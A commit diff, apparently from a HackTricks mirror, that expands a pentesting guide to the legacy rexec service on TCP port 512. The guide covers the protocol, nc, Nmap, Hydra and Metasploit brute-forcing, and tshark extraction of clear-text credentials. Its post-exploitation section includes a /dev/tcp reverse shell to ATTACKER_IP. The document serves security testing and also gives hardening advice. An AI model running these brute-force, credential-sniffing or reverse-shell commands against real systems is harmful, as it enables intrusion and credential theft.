maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1126 from HackTricks-wiki/research_update_src_network-services-pentesting_512-pentesting-rexec_20250715_014239

Browse Source 
Research Update Enhanced src/network-services-pentesting/512...
This commit is contained in:
SirBroccoli 2025-07-16 00:01:47 +02:00 committed by GitHub
commit 4728c8259c
1 changed files with 99 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

105
src/network-services-pentesting/512-pentesting-rexec.md
View File

@ -2,22 +2,115 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
**Default Port:** 512
**Default Port:** TCP 512 (`exec`)
```
PORT STATE SERVICE
512/tcp open exec
```
> 🔥 All traffic including credentials is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command.
### Protocol quick-look
1. Client connects to TCP 512.
2. Client sends three **NUL-terminated** strings:
* the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
* the **username**,
* the **password**.
3. A final NUL-terminated string with the **command** to execute is sent.
4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
If the credentials are valid you will receive the output of `id` straight back on the same connection.
### Manual usage with the client
Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
```bash
rexec -l user -p password <target> "uname -a"
```
If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
---
## Enumeration & Brute-forcing
### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
### Nmap
```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
The `rexec-brute` NSE uses the protocol described above to try credentials very quickly .
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
The module will spawn a shell on success and store the credentials in the database .
---
## Sniffing credentials
Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
```
(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.)
---
## Post-Exploitation tips
* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the users shell and executes the command via `/bin/sh -c <cmd>`. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
---
## Hardening / Detection
* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin`, `rsh` together they share most of the same codebase and weaknesses.
---
## References
* Nmap NSE `rexec-brute` documentation [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}}